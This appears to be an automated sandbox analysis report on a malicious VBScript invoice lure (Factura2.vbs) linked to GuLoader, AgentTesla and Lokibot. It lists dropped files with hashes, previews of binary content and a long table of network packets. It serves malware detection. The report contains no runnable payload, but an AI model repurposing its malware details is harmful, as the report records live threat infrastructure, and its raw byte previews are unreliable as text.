Match: C:\Users\user\AppData\Roaming\newfile\newfile.exe

Associated Sample Name / URL | Detection | Threat Name
APR 20204 RFQ .xlsx.vbs | malicious | AgentTesla, GuLoader
RFQ_2414976#U00b7pdf.vbs | malicious | GuLoader, Lokibot
QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbs | malicious | GuLoader, Lokibot
FACT AZUR TJ .pdf.vbs | malicious | AgentTesla, GuLoader
FACT AZUR TJ .pdf.vbs | malicious | AgentTesla, GuLoader
FACT AZUR TJ .pdf.vbs | malicious | AgentTesla, GuLoader
RFQ_.vbs | malicious | AgentTesla, GuLoader
58826828#U00b7pdf.vbs | malicious | GuLoader, Lokibot
2024-APR salary payroll confirm .pdf.vbs | malicious | AgentTesla, GuLoader
UNLP-9004898-Oferta#U00b7pdf.vbs | malicious | GuLoader, Lokibot
                                                                      Process:C:\Windows\System32\wscript.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):69993
                                                                      Entropy (8bit):7.99584879649948
                                                                      Encrypted:true
                                                                      SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                      MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                      SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                      SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                      SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                                                      Process:C:\Windows\System32\wscript.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):330
                                                                      Entropy (8bit):3.1475546137593846
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKZ+slllDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:DllMkPlE99SNxAhUeVLVt
                                                                      MD5:E7223244A0990B7F57AE1E7FB56F5148
                                                                      SHA1:105DB4D243B5424857784FCF2FA6DD395B017B68
                                                                      SHA-256:668400C568216B8AD3AE9318031885DDB40C12E1A7C5A6E6D15AA63F1975059E
                                                                      SHA-512:A9D01CE5ADF01508CD23728D50477012DDA6424574B68A5FBD9C7AB8A149176485CEBCAFCFF1A939A6ED4588BB549BFE6BB4B9944A7DD00500D177F3AF8ECFBB
                                                                      Malicious:false
                                                                      Preview:p...... ............g...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):11608
                                                                      Entropy (8bit):4.886255615007755
                                                                      Encrypted:false
                                                                      SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                      MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                      SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                      SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                      SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                      Malicious:false
                                                                      Preview:@...e................................................@..........
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):456672
                                                                      Entropy (8bit):5.944710967318808
                                                                      Encrypted:false
                                                                      SSDEEP:12288:zpKAtxvfjhHfQ0DE4sTvmmkbRGghuknmLo:zplBDE4sTemb8voo
                                                                      MD5:B87615809283894248FD746A584E882A
                                                                      SHA1:A59B42A75AC0530FCFFEB06E182A22BDC502B0A2
                                                                      SHA-256:4928CBD912FE97D2A6EC89742281AAFECCA616404D2B38AF09F4A389D58608CD
                                                                      SHA-512:BBF1AC55820C8F347AF346A038052DF2B6B0A217567B55F960E0340964816743BA5FF6DDE308B33FC00BD2A94D8085DDE8AC6D215FB6FA1932BA866D3677BB8C
                                                                      Malicious:false
Preview:
                                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):516608
                                                                      Entropy (8bit):6.035530871194082
                                                                      Encrypted:false
                                                                      SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                                                      MD5:251E51E2FEDCE8BB82763D39D631EF89
                                                                      SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                                                      SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                                                      SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                                                      Malicious:false
                                                                      Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: APR 20204 RFQ .xlsx.vbs, Detection: malicious
• Filename: RFQ_2414976#U00b7pdf.vbs, Detection: malicious
• Filename: QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbs, Detection: malicious
• Filename: FACT AZUR TJ .pdf.vbs, Detection: malicious
• Filename: FACT AZUR TJ .pdf.vbs, Detection: malicious
• Filename: FACT AZUR TJ .pdf.vbs, Detection: malicious
• Filename: RFQ_.vbs, Detection: malicious
• Filename: 58826828#U00b7pdf.vbs, Detection: malicious
• Filename: 2024-APR salary payroll confirm .pdf.vbs, Detection: malicious
• Filename: UNLP-9004898-Oferta#U00b7pdf.vbs, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                      File type:ASCII text, with CRLF line terminators
                                                                      Entropy (8bit):5.255552704639947
                                                                      TrID:
                                                                      • Visual Basic Script (13500/0) 100.00%
                                                                      File name:Factura2.vbs
                                                                      File size:215'511 bytes
                                                                      MD5:9500105068ac091471491a1a7c9065c2
                                                                      SHA1:f92e6b13cd0ae67dccebdcbbcdc5634a1c66aae8
                                                                      SHA256:ebfb38c8313f04d9afc3223ef7d30908d98880d333bff470da280d472b3cc836
                                                                      SHA512:c7e8cde3c01da28dbcb32298c6f89353a1c39beb64fe83e33c69f0d45a03596da4a4404a3df2603ce34a7077d112d71dc94bf7f490cc3596e5bf0b5ede14180d
                                                                      SSDEEP:6144:uYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfxqAe:j2dO9IT
                                                                      TLSH:B12418F09F0B36199F4B3EDAAC6445928AF58195051238B5AAD817ECB383D2CD3FDD18
                                                                      File Content Preview:..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb
                                                                      Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 18, 2024 10:10:57.627794027 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:57.627847910 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:57.627942085 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:57.636426926 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:57.636442900 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:57.869065046 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:57.869343996 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:57.870598078 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:57.870672941 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:57.876621962 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:57.876630068 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:57.877032995 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:57.889044046 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:57.932145119 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:58.090862036 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:58.090950012 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:58.090979099 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:58.091078043 CEST | 443 | 49700 | 64.233.185.138 | 192.168.2.6
Apr 18, 2024 10:10:58.091130972 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:58.094398022 CEST | 49700 | 443 | 192.168.2.6 | 64.233.185.138
Apr 18, 2024 10:10:58.203033924 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:58.203053951 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:58.203125954 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:58.203583956 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:58.203594923 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:58.429476976 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:58.429650068 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:58.433578014 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:58.433587074 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:58.433978081 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:58.435235023 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:58.480123997 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.089297056 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.089529991 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:59.095964909 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.096136093 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:59.110466003 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.110565901 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:59.117536068 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.171978951 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:59.171998024 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.194143057 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.194376945 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:59.194396973 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.198882103 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
Apr 18, 2024 10:10:59.198964119 CEST | 49701 | 443 | 192.168.2.6 | 74.125.138.132
Apr 18, 2024 10:10:59.198982954 CEST | 443 | 49701 | 74.125.138.132 | 192.168.2.6
                                                                      Apr 18, 2024 10:10:59.205080032 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.205152988 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.205172062 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.212066889 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.212152958 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.212174892 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.219470978 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.219559908 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.219567060 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.226542950 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.226650953 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.226656914 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.233913898 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.234028101 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.234051943 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.240892887 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.241018057 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.241025925 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.247831106 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.247908115 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.247914076 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.254287004 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.254378080 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.254384041 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266303062 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266345978 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266377926 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.266386032 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266426086 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.271469116 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.277921915 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.277997017 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.278023005 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.278031111 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.278070927 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.298791885 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302009106 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302072048 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302087069 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.302108049 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302151918 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.308722973 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315416098 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315479994 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315618038 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.315638065 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315700054 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.321818113 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327712059 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327786922 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327866077 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.327886105 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327933073 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.333372116 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338794947 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338852882 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338915110 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.338937044 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338982105 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.343323946 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.349771023 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.349984884 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.350003958 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.352485895 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.352550030 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.352556944 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.357593060 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.357650042 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.357656002 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.363370895 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.363436937 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.363456011 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.368586063 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.368645906 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.368665934 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.373344898 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.373409033 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.373415947 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.378134966 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.378204107 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.378210068 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.382258892 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.382311106 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.382318020 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.387809038 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.387864113 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.387870073 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.392344952 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.392402887 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.392409086 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.396528959 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.396612883 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.396619081 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.400789022 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.400851011 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.400856972 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.405208111 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.405283928 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.405289888 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.410932064 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.410967112 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.410990000 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.410995007 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.411040068 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.415162086 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418030024 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418107033 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418128967 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.418134928 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418174028 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.420723915 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.420819998 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.420871019 CEST49701443192.168.2.674.125.138.132
